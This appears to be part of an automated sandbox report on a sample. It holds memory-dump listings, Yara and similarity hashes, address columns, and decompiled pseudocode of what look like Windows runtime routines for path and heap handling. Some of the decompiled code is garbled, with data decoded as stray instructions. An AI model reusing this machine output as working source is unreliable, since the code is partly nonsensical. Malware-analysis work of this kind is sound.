                                  0x1e3bdc23
                                  0x00000000
                                  0x1e3bdbff
                                  0x1e3bdbf1
                                  0x1e3bdbdf
                                  0x1e3bdb8f
                                  0x1e3bdb92
                                  0x1e3bdb95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bdb95
                                  0x1e3bdb8d
                                  0x1e3bdb85
                                  0x1e3bdb74
                                  0x1e3bdc9f
                                  0x1e3bdca2
                                  0x1e3bdcb0
                                  0x1e3bdcb0
                                  0x1e3bdad1
                                  0x1e40b4e5
                                  0x1e40b4c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bd831
                                  0x1e3bd80d
                                  0x00000000
                                  0x1e3bd800
                                  0x1e40b47f
                                  0x1e40b485
                                  0x00000000
                                  0x1e40b485
                                  0x1e3bd665
                                  0x1e3bd652
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                  • Instruction ID: 990119460426a5bba8234111266570bc9a48462a151cc847a07367bce9c12197
                                  • Opcode Fuzzy Hash: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                  • Instruction Fuzzy Hash: BEE1D634A00359CFDB24CF15C998BA9B7B6BF45314F4143AAD80AA7790D734AD85CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00089862, Relevance: 1.7, Strings: 1, Instructions: 478COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3dfbe1b75ea3d38e2b88d8326b172b3d98761bc5e5e4fe49fe8d3191d60ed7d9
                                  • Instruction ID: 16394727ae8117a72aaf6507545b84ece0078d463d062a28062892381eb6009d
                                  • Opcode Fuzzy Hash: 3dfbe1b75ea3d38e2b88d8326b172b3d98761bc5e5e4fe49fe8d3191d60ed7d9
                                  • Instruction Fuzzy Hash: C5F13070518A4C8FDBA9FF68C895AEEB7E1FB98304F40462AE48ED7251DF349641CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A9E40, Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (
                                  • API String ID: 0-3887548279
                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                  • Instruction ID: cd3532cd2adf556f6980c534dbcbcc1549ba35db63d638346e6f6ab5dd92d10c
                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                  • Instruction Fuzzy Hash: D3021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E46D466, Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E1E46D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x1e49d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E1E46DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x1e49b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x1e496110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E1E46D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E1E3BFFB0(_t69, _t90, _t90 + 0xc);
				}
				return E1E3EB640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                  0x1e46d475
                                  0x1e46d47b
                                  0x1e46d492
                                  0x1e46d49e
                                  0x1e46d4a4
                                  0x1e46d4ac
                                  0x1e46d4bc
                                  0x1e46d4be
                                  0x1e46d4c4
                                  0x1e46d4cc
                                  0x1e46d4dc
                                  0x1e46d4e1
                                  0x1e46d4f5
                                  0x1e46d4fb
                                  0x1e46d4fd
                                  0x1e46d501
                                  0x1e46d53d
                                  0x1e46d503
                                  0x1e46d507
                                  0x1e46d50e
                                  0x1e46d510
                                  0x1e46d520
                                  0x1e46d524
                                  0x1e46d526
                                  0x1e46d528
                                  0x1e46d52b
                                  0x1e46d52e
                                  0x1e46d530
                                  0x1e46d530
                                  0x1e46d533
                                  0x1e46d536
                                  0x1e46d537
                                  0x1e46d53b
                                  0x00000000
                                  0x00000000
                                  0x1e46d526
                                  0x1e46d4c6
                                  0x1e46d4c6
                                  0x1e46d4c8
                                  0x1e46d4c8
                                  0x1e46d4c8
                                  0x1e46d540
                                  0x1e46d545
                                  0x1e46d555
                                  0x1e46d55a
                                  0x1e46d55a
                                  0x1e46d560
                                  0x1e46d562
                                  0x1e46d56e
                                  0x1e46d56e
                                  0x1e46d577
                                  0x1e46d57d
                                  0x1e46d57d
                                  0x1e46d594
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 690b664d99d19e4252e3a2869c40a79b3dd6a129a707b4ac4fa3ad47faf455f6
                                  • Instruction ID: d0864a4aa792041ed95bf704db7576d5e79ba1ee2efd8a65913471f86806883c
                                  • Opcode Fuzzy Hash: 690b664d99d19e4252e3a2869c40a79b3dd6a129a707b4ac4fa3ad47faf455f6
                                  • Instruction Fuzzy Hash: 9941AF71E0012A9BCB14DFA9C881ABEB7F5FF8C214B51426AE855E7340D770ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E1E3D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t235;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				void* _t275;
				signed int _t276;
				unsigned int _t279;
				signed int _t283;
				signed int _t287;
				signed int _t291;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				void* _t333;

				_t327 = _t329;
				_t330 = _t329 - 0x4c;
				_v8 =  *0x1e49d360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x1e49b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t279 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t301 = 0 | _t333 == 0x00000000;
				_t313 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L1E3C4620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t301 = _v32;
							 *(_t320 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t301 - 0x1e498478;
								 *_t320 = ((0 | _t301 == 0x1e498478) - 0x00000001 & 0xfffffffb) + 7;
								E1E3EF3E0(_t315,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t330 = _t330 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E1E4339F2(_t315);
									_t301 = _v32;
									_t315 = _t265;
								}
							}
							_t283 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t320 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t230 =  *(_v60 + _t283 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t271 =  *(_v60 + _t283 * 4);
										 *(_t271 + 0x18) = _t315;
										_t234 =  *(_v60 + _t283 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2959))) {
												case 0:
													__ax =  *0x1e498488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49848c, __ax & 0x0000ffff);
														__eax =  *0x1e498488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1E3EF3E0(_t315, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x1e498480 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e498484,  *0x1e498480 & 0x0000ffff);
													__eax =  *0x1e498480 & 0x0000ffff;
													__eax = ( *0x1e498480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1E3EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1E3EF3E0(_t315, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t330 = _t330 + 0xc;
													_t315 = _t315 + (_t260 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t315 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1E3EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1e498478 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49847c,  *0x1e498478 & 0x0000ffff);
													__eax =  *0x1e498478 & 0x0000ffff;
													__eax = ( *0x1e498478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1E4339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1e496e58 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e496e5c,  *0x1e496e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1e496e58 & 0x0000ffff;
													__eax = ( *0x1e496e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t283 = _v16;
													_t301 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t283 = _t283 + 1;
									_v16 = _t283;
									__eflags = _t283 - _v48;
								} while (_t283 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2935))) {
							case 0:
								__ax =  *0x1e498488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E1E3D2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1e498480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1E3BEEF0(0x1e4979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1E3BEB70(__ecx, 0x1e4979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t279 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1e497b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1E3BEB70(__ecx, 0x1e4979a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t327;
										_pop(_t272);
										return E1E3EB640(_t209, _t272, _v8 ^ _t327, _t301, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t269 = E1E3D2E3E(_t267,  &_v36);
									_t279 = _v36;
									_v76 = _t269;
								}
								if(_t279 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t279;
								}
								goto L14;
							case 6:
								__eax =  *0x1e495764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1e498478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1e496e58 & 0x0000ffff;
								__eax = ( *0x1e496e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags = _t234 - 0x3d28661e;
					_push(ds);
					asm("loopne 0x29");
					__eflags = _t234 - 0x3d262e1e;
					 *0x3d26051e =  *0x3d26051e - _t271;
					ds = ds;
					_t275 = ds;
					_push(ds);
					_t235 = _t330;
					_t332 = _t234;
					 *0x415b351e =  *0x415b351e - _t275;
					_push(ds);
					__eflags = _t235 - 0x3d28801e;
					_push(ds);
					__eflags = _t235 *  *_t315 - 0x3d281e1e;
					_push(ds);
					_t324 = _t320 + 1 - 1;
					 *0x3d275d1e =  *0x3d275d1e - _t275;
					_push(ds);
					asm("fcomp dword [ebx+0x41]");
					_push(ds);
					__eflags = 0x28 - 0x415c341e;
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1e47ff00);
					E1E3FD08C(_t275, _t315, _t324);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t276 = _a12;
					__eflags = _t276;
					if(_t276 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t291 = _t242 * 0xc;
							_v48 = _t291;
							__eflags = _t276 -  *((intOrPtr*)(_t291 + 0x1e381664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E1E3EE5C0(_a8,  *((intOrPtr*)(_t291 + 0x1e381668)), _t276);
									_t332 = _t332 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t325 = E1E4251BE(_t276,  *((intOrPtr*)(_v48 + 0x1e38166c)), _a16, _t316, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t316;
									if( *_t287 == _t316) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t287) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t325 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t247 = E1E3B6600( *(_t304 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E1E3D2C50(_t287, _a8, _t276, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t254 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _t325);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E1E3D2C50(_v36, _a8, _t276, _a16, _a20, _t325, 1);
									}
									_v8 = _t316;
									E1E3D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t325;
					}
					L70:
					return E1E3FD0D1(_t240);
				}
				L108:
			}




















































                                  0x1e3d2584
                                  0x1e3d2586
                                  0x1e3d2590
                                  0x1e3d2596
                                  0x1e3d2597
                                  0x1e3d2598
                                  0x1e3d2599
                                  0x1e3d259e
                                  0x1e3d25a4
                                  0x1e3d25a9
                                  0x1e3d25ac
                                  0x1e3d25ae
                                  0x1e3d25b1
                                  0x1e3d25b2
                                  0x1e3d25b5
                                  0x1e3d25b8
                                  0x1e3d25bb
                                  0x1e3d25bc
                                  0x1e3d25bf
                                  0x1e3d25c2
                                  0x1e3d25c5
                                  0x1e3d25c6
                                  0x1e3d25cb
                                  0x1e3d25ce
                                  0x1e3d25d8
                                  0x1e3d25db
                                  0x1e3d25dd
                                  0x1e3d25de
                                  0x1e3d25e1
                                  0x1e3d25e3
                                  0x1e3d25e9
                                  0x1e3d26da
                                  0x1e3d26da
                                  0x1e3d26dd
                                  0x1e3d26e2
                                  0x1e415b56
                                  0x00000000
                                  0x1e3d26e8
                                  0x1e3d26f9
                                  0x1e3d26fb
                                  0x1e3d26fe
                                  0x1e3d2700
                                  0x1e415b60
                                  0x00000000
                                  0x1e3d2706
                                  0x1e3d2706
                                  0x1e3d270a
                                  0x1e3d270a
                                  0x1e3d270d
                                  0x1e3d2713
                                  0x1e3d2716
                                  0x1e3d2718
                                  0x1e3d271c
                                  0x1e3d271e
                                  0x1e415b6c
                                  0x1e415b6f
                                  0x1e415b7f
                                  0x1e415b89
                                  0x1e415b8e
                                  0x1e415b93
                                  0x1e415b96
                                  0x1e415b9c
                                  0x1e415ba0
                                  0x1e415ba3
                                  0x1e415bab
                                  0x1e415bb0
                                  0x1e415bb3
                                  0x1e415bb3
                                  0x1e415ba3
                                  0x1e3d2724
                                  0x1e3d2726
                                  0x1e3d2729
                                  0x1e3d272c
                                  0x1e3d279d
                                  0x1e3d279d
                                  0x1e3d27a0
                                  0x1e3d27a2
                                  0x00000000
                                  0x1e3d272e
                                  0x1e3d272e
                                  0x1e3d2731
                                  0x1e3d2734
                                  0x1e3d2734
                                  0x1e3d2736
                                  0x1e415bc1
                                  0x1e415bc1
                                  0x1e415bc4
                                  0x00000000
                                  0x1e415bca
                                  0x1e415bca
                                  0x1e415bcd
                                  0x00000000
                                  0x1e415bd3
                                  0x00000000
                                  0x1e415bd3
                                  0x1e415bcd
                                  0x1e3d273c
                                  0x1e3d273c
                                  0x1e3d2742
                                  0x1e3d2747
                                  0x1e3d274a
                                  0x1e3d274d
                                  0x1e3d2750
                                  0x00000000
                                  0x1e3d2756
                                  0x1e3d2756
                                  0x00000000
                                  0x1e3d2902
                                  0x1e3d2908
                                  0x1e3d290b
                                  0x00000000
                                  0x1e3d2911
                                  0x1e3d291c
                                  0x1e3d2921
                                  0x00000000
                                  0x1e3d2921
                                  0x00000000
                                  0x00000000
                                  0x1e3d2880
                                  0x1e3d2887
                                  0x1e3d288c
                                  0x00000000
                                  0x00000000
                                  0x1e3d2805
                                  0x1e3d280a
                                  0x1e3d2814
                                  0x1e3d2816
                                  0x00000000
                                  0x00000000
                                  0x1e3d281e
                                  0x1e3d2821
                                  0x1e3d2823
                                  0x00000000
                                  0x1e3d2829
                                  0x1e3d2829
                                  0x1e3d2831
                                  0x1e3d283c
                                  0x1e3d283e
                                  0x00000000
                                  0x1e3d283e
                                  0x00000000
                                  0x00000000
                                  0x1e3d284e
                                  0x1e3d2850
                                  0x1e3d2851
                                  0x1e3d2854
                                  0x1e3d2857
                                  0x1e3d285a
                                  0x1e3d285c
                                  0x1e3d285d
                                  0x00000000
                                  0x00000000
                                  0x1e3d275d
                                  0x1e3d2761
                                  0x00000000
                                  0x1e3d2767
                                  0x1e3d276e
                                  0x1e3d2773
                                  0x1e3d2773
                                  0x1e3d2776
                                  0x1e3d2778
                                  0x1e3d277e
                                  0x1e3d277e
                                  0x1e3d2781
                                  0x1e3d2781
                                  0x1e3d2783
                                  0x1e3d2784
                                  0x00000000
                                  0x00000000
                                  0x1e415bd8
                                  0x1e415bde
                                  0x1e415be4
                                  0x1e415be6
                                  0x1e415be8
                                  0x1e415be9
                                  0x1e415bee
                                  0x1e415bf8
                                  0x1e415bff
                                  0x1e415c01
                                  0x1e415c04
                                  0x1e415c07
                                  0x1e415c0b
                                  0x1e415c0d
                                  0x1e415c0d
                                  0x1e415c15
                                  0x1e415c18
                                  0x1e415c1b
                                  0x1e415c1b
                                  0x1e415c1e
                                  0x00000000
                                  0x00000000
                                  0x1e3d28c3
                                  0x1e3d28c8
                                  0x1e3d28d2
                                  0x1e3d28d4
                                  0x1e3d28d8
                                  0x1e3d28db
                                  0x1e415c26
                                  0x1e415c28
                                  0x1e415c2d
                                  0x1e415c2d
                                  0x00000000
                                  0x00000000
                                  0x1e415c34
                                  0x1e415c36
                                  0x1e415c49
                                  0x1e415c4e
                                  0x1e415c54
                                  0x1e415c5b
                                  0x1e415c5d
                                  0x1e415c60
                                  0x1e3d2788
                                  0x1e3d2788
                                  0x1e3d278b
                                  0x1e3d278e
                                  0x1e3d278e
                                  0x1e3d278e
                                  0x1e3d2791
                                  0x00000000
                                  0x00000000
                                  0x1e3d2756
                                  0x1e3d2750
                                  0x00000000
                                  0x1e3d2794
                                  0x1e3d2794
                                  0x1e3d2795
                                  0x1e3d2798
                                  0x1e3d2798
                                  0x00000000
                                  0x1e3d2734
                                  0x1e3d272c
                                  0x1e3d2700
